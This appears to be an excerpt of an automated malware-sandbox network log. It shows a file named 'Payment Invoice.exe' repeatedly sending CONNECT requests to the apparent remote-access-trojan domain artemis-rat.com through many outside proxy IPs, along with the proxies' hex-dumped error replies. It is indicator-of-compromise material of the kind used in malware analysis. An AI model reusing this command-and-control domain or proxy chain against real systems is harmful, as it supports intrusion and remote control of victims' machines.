                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.027080059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.120479107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.214215994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.214263916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.214272022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.323647976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1177192.168.2.45349093.190.141.102148887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.825354099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.124607086 CET226INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Length: 101
                                                                Content-Type: text/plain; charset=utf-8
                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1178192.168.2.453471121.66.198.7641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.825387955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1179192.168.2.453476121.182.138.71807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.825656891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1180192.168.2.453506147.75.92.24494017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826075077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.112526894 CET356INHTTP/1.0 502 Bad Gateway
                                                                Server: Zscaler/6.3
                                                                Content-Type: text/html
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1181192.168.2.453473192.162.232.1510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826092005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1182192.168.2.45351523.137.248.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826181889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1183192.168.2.45350894.130.94.45807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826268911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1184192.168.2.45351049.13.131.163807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826633930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1185192.168.2.45348178.128.81.220316237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826905966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557410955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589682102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1186192.168.2.453445115.127.31.6680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.826910019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1187192.168.2.453456103.190.54.141807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.827208042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1188192.168.2.453442103.174.178.13310207076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.831397057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1189192.168.2.452971143.137.83.1379997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.831487894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.886430025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.886373043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.975028992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.089211941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.424541950 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1190192.168.2.45349879.110.119.20980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.832026958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557437897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589751005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777158976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886760950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.975099087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.101330996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.276777983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:00.792381048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1191192.168.2.45352513.229.47.109807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.834748983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.165930986 CET223INHTTP/1.1 400 Bad Request
                                                                Date: Mon, 11 Mar 2024 15:12:47 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Connection: close
                                                                Content-Length: 12
                                                                X-Kong-Response-Latency: 8.2015991210938e-05
                                                                Server: kong/2.8.1
                                                                Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                Data Ascii: Bad request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192192.168.2.45352147.243.205.131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.836280107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1193192.168.2.453567147.75.92.251100897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.842298031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.124627113 CET356INHTTP/1.0 502 Bad Gateway
                                                                Server: Zscaler/6.3
                                                                Content-Type: text/html
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1194192.168.2.453668104.17.37.235807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.842515945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.999387980 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1195192.168.2.453663156.154.112.21807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.845171928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.009097099 CET1286INHTTP/1.1 405 Method Not Allowed
                                                                Server: squid/3.5.25
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 1557
                                                                X-Squid-Error: ERR_UNSUP_REQ 0
                                                                X-Cache: MISS from .
                                                                X-Cache-Lookup: NONE from .:80
                                                                Via: 1.1 . (squid/3.5.25)
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 55 4e 53 55 50 5f 52 45 51 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 65 72 72 6f 72 3a 6d 65 74 68 6f 64 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 22 3e 65 72 72 6f 72 3a 6d 65 74 68 6f 64 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 55 6e 73 75 70 70 6f 72 74 65 64 20 52 65 71 75 65 73 74 20 4d 65 74 68 6f 64 20 61 6e 64 20 50 72 6f 74 6f 63 6f 6c 3c 2f 62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0a 0a 3c 70 3e 53 71 75 69 64 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 61 6c 6c 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 73 20 66 6f 72 20 61 6c 6c 20 61 63 63 65 73 73 20 70 72 6f 74 6f 63 6f 6c 73 2e 20 46 6f 72 20 65 78 61
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_UNSUP_REQ><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="error:method-not-allowed">error:method-not-allowed</a></p><blockquote id="error"><p><b>Unsupported Request Method and Protocol</b></p></blockquote><p>Squid does not support all request methods for all access protocols. For exa
